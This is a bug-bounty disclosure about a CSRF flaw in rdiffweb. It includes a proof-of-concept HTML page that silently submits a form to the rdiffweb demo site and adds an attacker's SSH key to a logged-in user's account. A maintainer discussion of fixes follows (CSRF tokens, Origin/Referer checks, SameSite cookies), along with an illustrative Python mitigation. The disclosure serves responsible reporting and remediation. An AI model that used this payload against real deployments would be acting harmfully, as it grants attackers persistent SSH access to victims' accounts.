Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb
Reported on
Sep 11th 2021
✍️ Description
Hello dear Rdiffweb team.
I found a CSRF vulnerability on the following endpoint that lets attackers create an SSH key with PoC.html.
🕵️♂️ Proof of Concept
1. A user with the right privileges should be logged in with Firefox or Safari.
2. The user goes to a website that contains PoC.html.
3. After visiting the attacker's website, an SSH key with the name bob@thinkpad-t530 will be created.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://rdiffweb-demo.ikus-soft.com/prefs/sshkeys" method="POST">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="title" value="bob@thinkpad-t530 " />
<input type="hidden" name="key" value="ssh-rsa MIICXAIBAAKBgQCpPefILQKzndiaxLp6M9+AlfZv/UahWXRrZgrGJb8kT8yeCa9U zqtsOlWi58Akp1U3TxMdizqLKA9ivrAFXNc/U/HkqeB73GIprPvYkiL++UxpJQKL bY2ybZK1+I5mWiaGhNec3KSvaTRKXQZpCYnKNM8smlLPc85a3MZs0/iIKQIDAQAB AoGAcf3eVjfq7+xLbsM/DvxNeCCJ4phnsFm+TnBmpVvbSKvvGCtRyv+A+t63u4f5 JTcH8L70ExwqDHypEEt758DGwSa+p7yfxYYNLcmTfjI+Hiqc05WpouwDcCeFvWwH Hrcg/+bbcY17G9PPn54Gcl5LUd0bNFd8hBwzdoKf0OdkX7kCQQD05SMnQNZxdgTG 4BHK1J+Uh2HNDruk6TilPyejPGlGKU72Y/Awt2GQv0ejHIYJznkDgQ2ic3q3yvzX SKZsWvM7AkEAsOqMQIwf0nw3I7zgFsTCsw6Bu46Sot/Qm0bZhNaDfyRGt5LodW5t aZkBZPZyMe8GNvKY1Y7KVPKRYYndJKuz6wJBAOTdS1gA2SfZ8qblettCkAxf5T+c +DIrHxwXhHSiHYRLUJclWLA+gPikOk+udXmusxtaPSLHpzUih96t75IuAUcCQHy8 MjzETx95ourYnWqQOfJDFScnI64gfZUtQ+oL0NTQv+dodett+0iLr1b/B467Rzdw nl9b+L4h9Gy/5iKXyRcCQCoyLH3foTFcEigySYkgdfdGv9LpWDPb9y0c2pbGJDcr 6moUZy5AQ3r4oJmpYoJQWpzUKk5FGTBkSnHo917J9Mg=" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Also, an attacker can send multiple requests with the help of iframes.
Fix
I just want to suggest that you set a CSRF token for this form.
Hey amammad, I've opened a PR on the repo asking for a security policy with email.
@admin hey admin
They already put their email in 25 days ago !!!
@amammad
I'm working on a different implementation because adding a CSRF token to every form breaks a few integrations for my customer. That said, I'm working on another mitigation to validate the Origin and Referer. That should cover all endpoints and future endpoints too.
Any thoughts on the subject?
First option:
You can set the SameSite attribute to Strict for all cookies, and I heard that this can cause some problems, but I don't know what kind of problems.
Second option:
But you can also set the SameSite attribute to Lax for all cookies, which is an appropriate option. But besides Lax, you should only accept requests with the HTTP POST method and use the GET method only when clients want to receive information, not change it.
With these two options you can have protection against CSRF.
In my opinion, checking the Origin header is a non-standard and old implementation; as we have the SameSite attribute for cookies, there isn't a need to implement something else.
I think you can read about strict SameSite and then, if you don't find any problems, this can be the easiest fix.
@amammad
I'm glad you talked about SameSite=Lax, I also added this functionality yesterday. I will complete the changes by adding unit tests for all of this and it should be good.
Thanks!
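The two mitigations discussed in this thread, the maintainer's Origin/Referer validation for state-changing requests and the reporter's SameSite=Lax session cookie, as an added illustration that is not rdiffweb's own code. The trusted-origin set, the header dictionary shape and the cookie name are assumptions for the example.

```python
from urllib.parse import urlsplit

# Read-only methods never change state, so they need no origin check.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def _origin_of(url):
    """Return scheme://host[:port] of a URL, or None if it cannot be parsed."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def is_trusted_request(method, headers, trusted_origins):
    """Decide whether a request may change state.

    Safe methods are always allowed. Any other method must carry an Origin
    header, or failing that a Referer header, whose scheme+host is in
    trusted_origins. A request with neither header is rejected so that a
    client which strips both cannot bypass the check. The header dict and
    trusted_origins set are assumed inputs for this example.
    """
    if method.upper() in SAFE_METHODS:
        return True
    trusted = {o.lower() for o in trusted_origins}
    # Header names are case-insensitive; normalise before looking them up.
    lower = {k.lower(): v for k, v in headers.items()}
    origin = lower.get("origin")
    if origin is not None:
        # Browsers send the literal "null" for opaque origins; it is never trusted.
        return origin.lower() in trusted
    referer = lower.get("referer")
    if referer:
        ref_origin = _origin_of(referer)
        return ref_origin is not None and ref_origin in trusted
    return False


def session_cookie_header(name, value, secure=True):
    """Build a Set-Cookie value with SameSite=Lax, so the browser withholds the
    session cookie on a cross-site POST like the auto-submitted form above."""
    attrs = [f"{name}={value}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    return "; ".join(attrs)
```

A cross-site form post from the report carries the attacker page's Origin, so it fails the first check; with SameSite=Lax the session cookie would not even accompany it.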
When you finish the tests and release a new version you can put a comment here, and if I find more CSRF issues I will report them from Huntr.
Changes are completed and released in rdiffweb 2.3.7.